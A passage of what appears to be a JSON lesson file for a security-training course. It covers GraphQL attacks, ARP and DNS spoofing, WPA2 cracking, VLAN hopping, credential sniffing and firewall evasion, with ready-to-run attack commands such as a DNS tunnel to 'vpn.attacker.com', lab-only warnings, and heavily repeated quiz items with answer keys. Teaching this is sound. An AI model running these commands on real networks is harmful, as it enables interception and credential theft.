victim"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"graphql-attacks","cat":"Web Application","title":"GraphQL Exploitation","diff":2,"xp":150,"intro":"Introspection, injection, and authorization bypass in GraphQL APIs.","sections":[{"type":"text","content":"GraphQL introspection reveals the entire schema. Nested queries cause DoS. Missing authorization lets you access any resolver."},{"type":"code","lang":"bash","content":"# Introspection query \u2014 dump the schema\ncurl -X POST https://target.com/graphql -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{types{name fields{name}}}}\"}'|\njq\n# IDOR via GraphQL\n{user(id: 2) { email password }}\n# Nested query DoS\n{users{posts{comments{user{posts{comments{user}}}}}}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"GraphQL introspection reveals...","opts":["Source code","The entire API schema","Database credentials","Server version"],"ans":1},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"arp-spoofing","cat":"Network Attacks","title":"ARP Spoofing / Poisoning","diff":1,"xp":100,"intro":"Position yourself as man-in-the-middle on the local network.","sections":[{"type":"text","content":"ARP has no authentication. Send fake ARP replies to associate your MAC with the gateway IP \u2014 all traffic flows through you."},{"type":"code","lang":"bash","content":"# Enable IP forwarding first!\necho 1 > /proc/sys/net/ipv4/ip_forward\n# ARP spoof with arpspoof\narpspoof -i eth0 -t 192.168.1.100 192.168.1.1  # tell victim you're the gateway\narpspoof -i eth0 -t 192.168.1.1 192.168.1.100  # tell gateway you're the victim\n# Or with bettercap\nbettercap -iface eth0 -eval 'arp.spoof on; net.sniff on'"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"ARP spoofing works because ARP...","opts":["Is encrypted","Has no authentication","Uses TCP","Requires a password"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"dns-poisoning","cat":"Network Attacks","title":"DNS Cache Poisoning","diff":2,"xp":200,"intro":"Redirect traffic by injecting fake DNS responses.","sections":[{"type":"text","content":"If you can predict the DNS transaction ID or race the legitimate response, inject a fake answer that maps a domain to your IP."},{"type":"code","lang":"bash","content":"# DNS spoofing with ettercap\necho 'target.com A 10.10.14.1' > dns.txt\nettercap -Tq -i eth0 -P dns_spoof -M arp:remote /gateway// /victim//\n# With bettercap\nbettercap -eval 'set dns.spoof.domains target.com; set dns.spoof.address 10.10.14.1; dns.spoof on; arp.spoof on'"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"DNS poisoning redirects traffic by...","opts":["Modifying /etc/hosts","Injecting fake DNS responses into the cache","Changing the DNS server","Blocking DNS queries"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"wifi-cracking-wpa","cat":"Network Attacks","title":"Wi-Fi WPA2 Cracking","diff":2,"xp":150,"intro":"Capture the 4-way handshake and crack the pre-shared key offline.","sections":[{"type":"text","content":"Capture a WPA2 handshake (or force one with a deauth), then crack the PSK offline with a wordlist."},{"type":"code","lang":"bash","content":"# Set monitor mode\nairmon-ng start wlan0\n# Capture traffic\nairodump-ng wlan0mon\n# Target specific network\nairodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon\n# Deauth to force handshake\naireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon\n# Crack\naircrack-ng capture-01.cap -w rockyou.txt\n# Or with hashcat (faster)\nhashcat -m 22000 capture.hc22000 rockyou.txt"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"WPA2 cracking requires capturing the...","opts":["SSID","4-way handshake","Beacon frames","Probe requests"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"vlan-hopping","cat":"Network Attacks","title":"VLAN Hopping","diff":2,"xp":150,"intro":"Jump between VLANs when switches are misconfigured.","sections":[{"type":"text","content":"If a switch port is set to auto-negotiate trunking, an attacker can send 802.1Q-tagged frames to access other VLANs."},{"type":"code","lang":"bash","content":"# Switch spoofing: negotiate a trunk\n# Use yersinia or Scapy\nyersinia dtp -attack 1 -interface eth0\n# Double tagging: encapsulate a frame with two VLAN tags\n# Outer tag = native VLAN (stripped by first switch)\n# Inner tag = target VLAN (forwarded by second switch)\nscapy> sendp(Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst='target')/ICMP())"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Double VLAN tagging exploits...","opts":["Trunk negotiation","The native VLAN stripping behavior","MAC flooding","ARP spoofing"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"packet-sniffing","cat":"Network Attacks","title":"Network Packet Sniffing","diff":1,"xp":75,"intro":"Capture and analyze network traffic for credentials and data.","sections":[{"type":"text","content":"On a shared network (or after ARP spoofing), capture packets to find cleartext credentials in FTP, HTTP, Telnet, SMTP."},{"type":"code","lang":"bash","content":"# Capture with tcpdump\ntcpdump -i eth0 -w capture.pcap\n# Filter for HTTP POST (credentials)\ntcpdump -i eth0 -A 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'\n# Capture FTP credentials\ntcpdump -i eth0 port 21 -A | grep -i 'USER|PASS'\n# Wireshark filter for HTTP passwords\nhttp.request.method == POST"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Which protocol sends credentials in cleartext?","opts":["HTTPS","SSH","FTP","SFTP"],"ans":2},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"firewall-evasion","cat":"Network Attacks","title":"Firewall & IDS Evasion","diff":2,"xp":150,"intro":"Get your traffic past network defenses.","sections":[{"type":"text","content":"Fragment packets, use decoy scans, encrypt payloads, tunnel through allowed protocols, or slow down to avoid rate-based detection."},{"type":"code","lang":"bash","content":"# Nmap fragmentation\nnmap -f 10.10.10.5\n# Decoy scan\nnmap -D RND:10 10.10.10.5\n# Slow scan (evade time-based IDS)\nnmap -T1 10.10.10.5\n# Source port manipulation\nnmap --source-port 53 10.10.10.5\n# Tunnel through DNS\niodine -f vpn.attacker.com\n# Tunnel through HTTP\nchisel client target:8080 R:socks"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Packet fragmentation evades firewalls by...","opts":["Encrypting the payload","Splitting the payload across fragments that bypass pattern matching","Using UDP","Changing the source IP"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File 